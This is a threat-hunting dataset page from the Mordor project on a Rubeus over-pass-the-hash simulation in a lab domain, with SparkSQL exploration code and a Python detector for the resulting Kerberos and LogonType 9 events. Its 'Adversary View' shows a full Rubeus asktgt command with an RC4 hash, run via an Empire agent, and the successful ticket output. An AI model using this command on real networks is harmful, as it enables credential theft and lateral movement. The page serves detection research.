Rubeus Elevated ASKTGT CreateNetOnly

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/21

Tactics

['TA0006']

Techniques

['T1003.003']

Tags

['Over-Pass-The-Hash', 'Not Touching LSASS']

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Notebooks

Notebooks created by the community leveraging the Mordor datasets:

Author | Name | Link

Simulation Plan

Environment  | Tool Type | Module
Mordor shire | C2        | shell
Mordor shire | binary    | asktgt

Adversary View

(Empire: G6BYHU4F) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\Windows\System32\cmd.exe
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 4
(Empire: 4EH9PC5S) > 
   ______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Showing process : False
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 10064
[+] LUID            : 0x42e7ba4

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Target LUID : 70155172
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

[*] Target LUID: 0x42e7ba4
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 11:03:07 PM
  EndTime               :  9/22/2020 9:03:07 AM
  RenewTill             :  9/28/2020 11:03:07 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  TqCSqXQzrd62vesN78SIDA==


..Command execution completed.

(Empire: 4EH9PC5S) > 

Explore Mordor Dataset

Initialize Analytics Engine

# openhunt's Mordor helpers; get_spark() returns the SparkSession the notebook uses
from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

# Download the dataset zip and register its events as a temporary SparkSQL view
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

# Count events per host, channel and EventID to see which log sources the dataset contains
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |526  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |394  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |353  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |284  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |226  |
|WORKSTATION6.theshire.local|security                                |4703   |214  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |175  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |169  |
|WORKSTATION6               |Windows PowerShell                      |800    |151  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |129  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |18     |103  |
|WORKSTATION5.theshire.local|security                                |4703   |87   |
|WORKSTATION6.theshire.local|security                                |4658   |64   |
|WORKSTATION5.theshire.local|security                                |4658   |62   |
|WORKSTATION5.theshire.local|security                                |4656   |52   |
|MORDORDC.theshire.local    |Security                                |5156   |44   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |43   |
|MORDORDC.theshire.local    |Security                                |5158   |34   |
|WORKSTATION6.theshire.local|security                                |4656   |32   |
|WORKSTATION6.theshire.local|security                                |4690   |32   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
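As an added example (not code from the Mordor project or its notebooks), the two signals this dataset is built to exercise, written in plain Python over constructed records shaped like the dataset's Sysmon and Security events: a Kerberos (port 88) connection from a process other than lsass.exe, since Rubeus builds and sends the AS-REQ itself, and a Security 4624 logon with LogonType 9, the LOGON_TYPE = 9 shown in the adversary view. Hostnames, the Rubeus path, timestamps and the five-minute window are constructed assumptions; the field names follow the standard Sysmon and Security event schema.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the dataset), shaped like this dataset's
# Sysmon EventID 3 and Security EventID 4624 JSON events; values are made up.
SAMPLE_EVENTS = [
    {"@timestamp": "2020-09-22T03:03:05.000Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "security", "EventID": 4624, "LogonType": "9", "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "sbeavers"},
    {"@timestamp": "2020-09-22T03:03:07.000Z", "Hostname": "WORKSTATION6.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "Image": "C:\\users\\sbeavers\\Desktop\\Rubeus.exe", "DestinationPort": 88},
    {"@timestamp": "2020-09-22T03:01:00.000Z", "Hostname": "WORKSTATION5.theshire.local",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "Image": "C:\\Windows\\System32\\lsass.exe", "DestinationPort": 88},
]

LSASS = "c:\\windows\\system32\\lsass.exe"

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%fZ")

def kerberos_from_unusual_process(events):
    """Sysmon EID 3 to port 88 from anything but lsass.exe. A raw AS-REQ built by
    the tool itself leaves the KDC connection on the tool's process, not on LSASS."""
    return [e for e in events
            if e.get("EventID") == 3 and int(e.get("DestinationPort", 0)) == 88
            and e.get("Image", "").lower() != LSASS]

def new_credentials_logons(events):
    """Security 4624 with LogonType 9 (NewCredentials): the LOGON_TYPE = 9 that
    /createnetonly reports when it spawns the sacrificial process."""
    return [e for e in events
            if e.get("EventID") == 4624 and str(e.get("LogonType")) == "9"]

def correlate(events, window=timedelta(minutes=5)):
    """Pair each unusual port-88 connection with a type-9 logon on the same host
    inside the window. Returns (host, image, logon_process) tuples."""
    hits = []
    logons = new_credentials_logons(events)
    for conn in kerberos_from_unusual_process(events):
        t = parse_ts(conn["@timestamp"])
        for lg in logons:
            if (lg["Hostname"] == conn["Hostname"]
                    and abs(parse_ts(lg["@timestamp"]) - t) <= window):
                hits.append((conn["Hostname"], conn["Image"], lg["LogonProcessName"]))
    return hits

if __name__ == "__main__":
    for hit in correlate(SAMPLE_EVENTS):
        print("possible over-pass-the-hash:", hit)
```

The same two filters translate directly into SparkSQL over mordorTable (EventID = 3 AND DestinationPort = 88 AND Image not lsass.exe; EventID = 4624 AND LogonType = 9) joined on Hostname.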